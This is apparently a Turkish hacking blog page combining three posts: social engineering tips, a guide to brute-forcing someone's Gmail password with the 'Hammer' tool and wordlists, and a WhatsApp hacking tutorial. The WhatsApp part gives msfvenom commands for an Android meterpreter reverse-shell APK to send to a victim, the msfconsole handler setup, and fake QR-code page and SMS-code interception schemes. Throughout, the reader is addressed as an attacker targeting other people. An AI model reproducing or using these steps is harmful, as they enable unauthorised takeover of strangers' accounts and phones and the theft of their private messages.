Sosyal Mühendislik Nedir? | Sosyal Mühendislik Nasıl Yapılır?

Günümüzün en net hackleme yöntemi olara kullanılan sosyal mühendislik kavramını ele alacağımz.Siber güvenlik alanında oldukça popüler olarak sosyal mühendislik saldırıları popülerliğini korumaya devam ediyor.

Sosyal Mühendislik Nedir?

Sosyal Mühendislik, bilgisayar sistemlerinin yetki dışında olan erişimleri elde etmek amacı ile gizli dosyaları ve ya bilgilere ulaştırma sanatıdır diyebiliriz.Hacklerin olduça çok fazla kullandığı hilelerden birisidir.Ünlü Hacker olan Kevin D.Mitnick yazmış olduğu Aldatma Sanatı kitabını kesinlikle okumanızı tavsiye ediyorum.

Sosyal Mühendislik Saldırıları Püf Noktaları

  1. Sosyal Mühendislik yapacağınız zaman amaç para olmamalı.Ulaşılması zor olan durumlarda hacklemek istediğiniz sisteme kolayca bir şekilde erişmektir.
  2. Sosyal Mühendis olabilmeniz için çok bilgiye ihdiyaç olmadan, kendinizin hayal ettiğiniz bir çok sisteme yetkisiz girişi yani hackleyebilirsiniz.

Sosyal Mühendislik Planları Neler?

  1. Bilgi Toplama:Hacklemek istediğiniz kişinin detayları bir analizini çıkartmanız da fayda var.Bunlar kesin olarak kurbanın yakın arkadaşları, web siteleri, hangi alana odaklı, hobileri nelerdir vb bilgiler saldırı yapılmadan önce toplanmalıdır.
  2. Planlı Saldırı:Bir saldırı yapacaksanız o saldırı için önceden plan yapmanız da fayda var.
  3. Saldırı Araçları:Saldıracağınız kişiye odaklı programlar sizlere saldırı aşamasında oldukça kolaylık sağlayacaktır.Bir saldırıya başlamadan önce ihdiyaçlarınızı belirlemenizde fayda olacaktır.
  4. Bilgileri Yararlı Kullanma:Hedef kişiyi bilgi toplamada elde ettiğiniz verileri, nerede kullanacağınız çok önemli bir husustur.Bir çok sosyal mühendislik saldırılarının arasında topladığınız bilgiler ve şifre tahminleriniz oldukça yararlı olacaktır.

Sosyal Mühendislik Bulunması Gereken Özellikler Neledir?

  1. Her zaman ikna gücü yeteneği geliştirilmiştir.
  2. Karşı tarafı nasıl etkileyeceğini geliştirmiştir.
  3. Ne kadar çok bilgili olur ise olsun karşı tarafa bu kadar çok bilgili olduğunu asla göstermezler
  4. Hedef kişiye nasıl saldıracaklarının senaryolarını hayal etme ve oluşturma yeteneği olduça yüksektir.

 


Gmail Hackleme | Gmail Hesabı Hackleme? | Gmail Hesabı Nasıl Hacklenir

Google tarafından yazılan ve mail platformu olan Gmail, günümüzün hemen hemen her kullanıcısı tarafından kullanılmakta olduğunu biliyoruz.Gelişen teknoloji ile beraberinde gelen zaafiyetler sonucun'da mail hesaplarını hacklemek kolay bir hale gelmiş bulunmakta.Sizlere bu yazımız'da gmail hesabı nasıl hacklenir, gmail şifresi nasıl kırılır vs sorularını yanıtlayacağım.

Bir gmail hesabını hacklemek, her zaman ki gibi kolay bir iş olmadığını başta söylemek istiyorum.Tabi ki hacklemek mümkün fakat kolay bir işlem değil.

Gmail platformunu kullanan kullanıcıların çoğu, online oyunlarda, bankacılık işlemlerinde vb sitelerde gmail hesaplarını kullanabiliyor.Hemen hemen her yerde kullanılan gmail hesaplarını hacklemek mümkün olduğunu söylemek istiyorum.Peki bir kişinin gmail hesabı nasıl hacklenir, hackerlar tarafından nasıl bir uygulama kullanılıyor ?

İlk başta saldıracağınız kişi tanıdık birisiyse veya onun hakkında bilginiz var ise gmail hesabının şifresini tahmin etmek zor olmayacaktır.Sosyal medya kullanıcılarının mail hesaplarınının %70 şifrelerini kolay koydukları için kırmak çok kolay olabiliyor.Saldırı yapacağınız kişiyi tanımıyorsanız, işler biraz daha zorlaşacağını söylemek istiyorum.

Tabi ki her zor olan durumun bir çözümü mevcut olduğunu söyleyebilirim.İnternette rahatlık ile bulabileceğiniz milyarlarca wordlist dosyayı mevcut.Herhangi birisini kullanarak kolay bir şekilde gmail hesabı hackleyebilirsiniz.

İHDİYAÇLAR;

  1. Kali(Linux) İşletim Sistemi 
  2. Android Cep Telefonu

Yukarıdakilerden herhangi birisi elinizin altında ise sizlere aşağıda anlatacağım adımları doğru bir şekilde yaptığınız takdirde gmail hesabı hacklemek mümkün hale gelecektir.

Kullanacağımız Tool:Termux Hummer

  1. Terminal ekranınıza git clone Tıkla yazın.
  2. Daha sonra cd Hammer diyerek klasör içerisine girin.
  3. Daha sonra python Hammer.py diyerek tool çalıştırın.

Kurulumu Tamamladıktan Daha Sonra Aşağıda ki Adımları Uygulayınız

Karşılaştığınız bu ekranda komut bölümüne 6 yazın ve enter basın.Daha sonra mail login diye bir kısım gelicektir.Oraya gmail hesabını hacklemek istediğiniz kişinin adresini yazıyoruz.Password list yazan yere ise internetten indirmiş olduğunuz wordlist dosyasının yolunu veriyoruz.Daha sonra karşınıza çıkacak ekrandan 1 seçiyoruz ve girmiş olduğunuz gmail hesabına saldırı işlemi başlıyor.


Whatsapp Nasıl Hacklenir ? | Whatsapp Hackleme 2019

 

İndirdiğiniz Apk Dosyaları Asla Güvenli Değil

Başlıkta görmüş olduğunuz gibi "Apk" dosyaları artık günümüzde neredeyse güvenli olmama durumuna geldi.Metasploit Termuxa(Android cep telefon linux uç birim) olarak gelmiş bulunmaktadır.Bu durumda Kali işletim sisteminden bir farkı kalmamıştır.Peki whatsapp nasıl hacklenir? sorusuna karşılık konumuzun detaylarına iniyoruz.Cep telefonunda termux ile bir zararlı apk dosyası oluşturarak, hacklemek istediğiniz kullanıcıya gönderiyoruz.Kurban bizim göndermiş olduğumuz zararlı apk dosyasını mobil cihazında açtığı takdirde MetaSploit konsol bölümünde bulunan msfconsole tarafında tarafınıza bir kapı açılır.

Peki Bu Durumda Ne Yapabiliriz?

Bugün ki yazımız'da Whatsapp nasıl hacklenir, Whatsapp hacklemek için neler yapılmalı sorularına yanıt arıyoruz.Peki Whatsapp nasıl hacklenir?

Whatsapp hacklemek için sizlere toplam bulunan 2 güzel yolu söyliyeceğim.

  1. Qr kod ile sahte bir whatsapp sayfası oluşturuyoruz ve whatsapp hacklemek istediğiniz kişinin telefonuna yapmış olduğunuz sahte whatsapp sayfasını gönderiyoruz.Eğer ki kurban karşısına çıkan qr kodu okutursa otomatik tüm mesajları size gelmiş oluyor.
  2. Sms ile hacklemek alternatif yollardan birisidir.Whatsapp bildiğiniz üzere uygulamaya girişlerde bir kod oluşturuyor.Hesab girişlerinde kullanılan bu kodu öğrenirsek otomatikman tekrar tüm mesajlara ulaşabiliyoruz.

Sizlere anlatmış olduğumuz 2 alternatif yol ile kolay bir şekilde whatsapp hackleyebilirsiniz.Fakat 2.yol kişinin cep telefonunu hackleyip smslerine müdahale eder isek hacklemek istediğiniz kişinin cep telefonunda bulunan tüm sosyal medya hesaplarınıda hackleyebilirsiniz.

Kullanacağınız Gerekli Uygulamalar;

  1. Termux
  2. Whatsapp Business

Şimdi Whatsapp Nasıl Hacklenir Sorusuna Yanıt Arayalım

İlk olarak Anroid cihanıza indirmiş olduğunuz Termux adlı uygulamayı açalım.Daha sonra aşağıda eklemiş olduğum video üzerinde anlatıldığı gibi komutları uygulayalım.

Kurulum Komutları

İlk olarak Uyguluma Ayarların/Termux/İzinler/Kayit yerine izin verelim.

  1. pkg install git curl
  2. pkg install pip pip2
  3. pkg install python python2
  4. pkg install ruby
  5. gem install bundle
  6. apt update
  7. apt upgrade
  8. pkg install vim

Detaylı Kullanım Komutları Video

Videoda kullanılan komutları aşağıda listede verdim.

  1. ./msfvenom -p android/meterpreter/reverse_tcp LHOST= ip adresinizi yazalım LPORT=4444 R > /sdcard/test.apk 
  2. İp adresinizi (ifconfig) yazarak öğrenebilirsiniz.
  3. /msfconsole
  4. use exploit/multi/handler
  5. )set payload android/meterpreter/reverse_tcp
  6. set LHOST (ip adresiniz)
  7. set LPORT 4444
  8. Exploit

Yazımızı sonlandırırken umarım faydalı olmuştur.Yapacağınız tüm işlemler kendi sorumluluğunuzdadır.

 

 

 

 


İlginizi Çekebilecek Yazılar